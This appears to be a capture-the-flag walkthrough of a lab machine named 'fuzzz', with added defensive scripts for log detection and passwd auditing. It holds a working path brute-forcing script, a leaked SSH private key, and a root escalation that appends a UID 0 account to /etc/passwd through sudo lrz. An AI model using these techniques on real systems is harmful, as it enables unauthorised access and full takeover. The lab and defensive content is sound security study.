4.fuzzz

1. Information gathering

┌──(root㉿kali)-[~/Desktop/hmv/fuzzz]
└─# nmap 192.168.56.111 -sCV -p-               
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 22:26 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_  256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 08:00:27:52:E7:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
/home $ netstat -lnpt
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      2511/python3
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -

We can see that port 80 is listening on the loopback interface only.
Use socat to forward it out:

socat TCP-LISTEN:1112,fork TCP:127.0.0.1:80
┌──(root㉿kali)-[~/Desktop/tools]
└─# gobuster dir -u http://192.168.56.111:1112 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111:1112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]
/line3                (Status: 200) [Size: 0]
/line4                (Status: 200) [Size: 0]
/line01               (Status: 200) [Size: 0]
/line02               (Status: 200) [Size: 0]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

I ran this brute force many times, tried other paths, and tested by hand. What I noticed: the size is always 0, so there should be no hidden files; the URL path itself is the hint. A correct path returns 200 and a wrong one returns 404.
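The oracle described above leaves a very recognisable trace in the web server's access log: one client issues a long run of requests where each path is a previously confirmed path plus one character, most of them answered with 404 and all of them with an empty body. The following detection script is an added example written for this writeup's defender side, not code from the original post; it assumes Apache/nginx common log format, and the sample log lines are constructed (client 10.0.0.5 walks /line1/ one character at a time, 10.0.0.9 is ordinary traffic).

```python
import re
from collections import defaultdict

# Constructed sample in common log format (not taken from the writeup).
# 10.0.0.5 walks /line1/ one character at a time; 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2025:13:50:00 +0000] "GET /line1 HTTP/1.1" 200 0
10.0.0.5 - - [20/May/2025:13:50:01 +0000] "GET /line1/a HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2025:13:50:01 +0000] "GET /line1/b HTTP/1.1" 200 0
10.0.0.5 - - [20/May/2025:13:50:02 +0000] "GET /line1/ba HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2025:13:50:02 +0000] "GET /line1/bb HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2025:13:50:02 +0000] "GET /line1/b3 HTTP/1.1" 200 0
10.0.0.5 - - [20/May/2025:13:50:03 +0000] "GET /line1/b3a HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2025:13:50:03 +0000] "GET /line1/b3b HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2025:13:50:03 +0000] "GET /line1/b3c HTTP/1.1" 404 0
10.0.0.9 - - [20/May/2025:13:50:04 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [20/May/2025:13:50:05 +0000] "GET /style.css HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return (ip, path, status, size) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return m.group("ip"), m.group("path"), int(m.group("status")), size


def score_clients(log_text, min_requests=5, min_ratio=0.6):
    """Flag clients whose requests keep extending an already-confirmed path by one character.

    For each client we remember the paths that were answered with 200. A request is an
    'extension' when dropping its last character yields one of those paths (a trailing
    '/' is ignored, so /line1/a counts as extending /line1). A client with at least
    min_requests requests and extensions/requests >= min_ratio is reported together
    with its 404 count and its count of zero-size responses.
    """
    stats = defaultdict(lambda: {"requests": 0, "not_found": 0, "zero_size": 0, "extensions": 0})
    confirmed = defaultdict(set)  # ip -> paths this client got a 200 for
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ip, path, status, size = parsed
        s = stats[ip]
        s["requests"] += 1
        if status == 404:
            s["not_found"] += 1
        if size == 0:
            s["zero_size"] += 1
        parent = path[:-1].rstrip("/")
        if parent and parent in confirmed[ip]:
            s["extensions"] += 1
        if status == 200:
            confirmed[ip].add(path)
    flagged = {}
    for ip, s in stats.items():
        if s["requests"] >= min_requests and s["extensions"] / s["requests"] >= min_ratio:
            flagged[ip] = dict(s)
    return flagged


if __name__ == "__main__":
    for ip, s in score_clients(SAMPLE_LOG).items():
        print(f"{ip}: {s['extensions']}/{s['requests']} prefix-extending requests, "
              f"{s['not_found']} x 404, {s['zero_size']} empty responses")
```

The thresholds are deliberately loose; in practice the run would be fed from the live log and combined with a per-client rate, and the server-side fix is simply not to answer a partial path differently from a wrong one.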

Write a script to brute-force the full path:

import requests
import string
from urllib.parse import quote

# Target base URL (the writeup's own value; point it at the socat-forwarded host:port)
BASE_URL = "http://192.168.56.112:1111"
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{}|;:',.<>?" + '%2f/'
TIMEOUT = 5  # seconds per request, so a stalled server cannot hang the loop

# Avoid double-slash problems when joining URL parts
def clean_url(*parts):
    return "/".join(part.strip("/") for part in parts)

# Stage one: enumerate all line paths (line1, line2, ...)
def find_lines():
    print("[*] Enumerating line paths...")
    line_list = []
    i = 1
    while True:
        line_url = f"{BASE_URL}/line{i}"
        r = requests.get(line_url, timeout=TIMEOUT)
        if r.status_code == 200:
            print(f"[+] Found: /line{i}")
            line_list.append(f"line{i}")
            i += 1
        else:
            print(f"[-] Not found: /line{i}, stopping enumeration.")
            break
    return line_list

# Stage two: brute-force the sub-path under each line path (e.g. line1/b3),
# one character at a time; the server answers 200 for a correct prefix and 404 otherwise
def brute_path(line):
    print(f"\n[*] Brute-forcing path: /{line}/...")
    found = ""

    while True:
        for c in CHARSET:
            try_path = clean_url(BASE_URL, line, found + c)
            # Stop if three consecutive slashes appear (the slash characters in CHARSET can pile up)
            if "///" in try_path:
                print(f"[!] '///' appeared in URL: {try_path}, stopping brute force of /{line}.")
                return found

            encoded_path = quote(try_path, safe=':/')
            r = requests.get(encoded_path, timeout=TIMEOUT)

            if r.status_code == 200:
                found += c
                print(f"[+] Hit: /{line}/{found}")
                break
        else:
            # for/else: no character produced a 200, so the path is complete
            print(f"[!] No more characters hit, stopping brute force of /{line}.")
            return found

if __name__ == "__main__":
    lines = find_lines()
    results = {}

    for line in lines:
        path = brute_path(line)
        results[line] = path

    print("\n[*] Final results:")
    for line, path in results.items():
        print(f"/{line}/{path}")


This is obviously a private key:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----

After connecting, checking sudo shows lrz is available.

lrz is used to receive files. It has an append mode, so we can append an entry directly to passwd.

Create a new passwd file and replace it:

sudo lrz -+

hack:$1$DZpa0Mvh$nRsXiHzu1rp88Hk9.GV9C0:0:0:root:/root:/bin/sh
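What gets written here is an account with UID 0 whose password hash lives in the world-readable passwd file rather than in shadow; both properties are easy to audit for. The following checker is an added example for the defender side of this writeup, not code from the original post. The sample file is constructed (the first four entries are made up; the last one is the entry appended above), and the `$1$` prefix is md5crypt, which is why it is additionally reported as a legacy hash.

```python
# Constructed /etc/passwd sample (not the machine's real file). The last line is the
# entry the writeup appends: a crypt hash in the password field and UID/GID 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
user1:x:1000:1000::/home/user1:/bin/sh
hack:$1$DZpa0Mvh$nRsXiHzu1rp88Hk9.GV9C0:0:0:root:/root:/bin/sh
"""

# Password-field values that do NOT carry a hash: shadowed ('x') or locked ('*', '!', '!!').
NON_HASH_MARKERS = ("x", "*", "!", "!!")


def audit_passwd(text):
    """Return a list of (username, issue) tuples for suspicious passwd entries.

    Checks: malformed lines, duplicate names, non-numeric ids, a hash (or an empty
    password) stored in passwd instead of shadow, legacy md5crypt ('$1$') hashes,
    and any UID 0 account that is not root.
    """
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        if not uid.isdigit() or not gid.isdigit():
            findings.append((name, "non-numeric uid/gid"))
            continue
        if pw == "":
            findings.append((name, "empty password field (login without password)"))
        elif pw not in NON_HASH_MARKERS:
            findings.append((name, "password hash stored in passwd instead of shadow"))
            if pw.startswith("$1$"):
                findings.append((name, "legacy md5crypt hash"))
        if int(uid) == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
    return findings


def audit_file(path="/etc/passwd"):
    """Convenience wrapper to audit the live file on a host."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for name, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {issue}")
```

Run periodically (or from a file-integrity monitor triggered on /etc/passwd writes) this catches the appended account immediately; the matching preventive control is to keep file-receiving tools such as lrz out of sudo rules altogether, since any sudo rule that lets a user write an arbitrary file is equivalent to root.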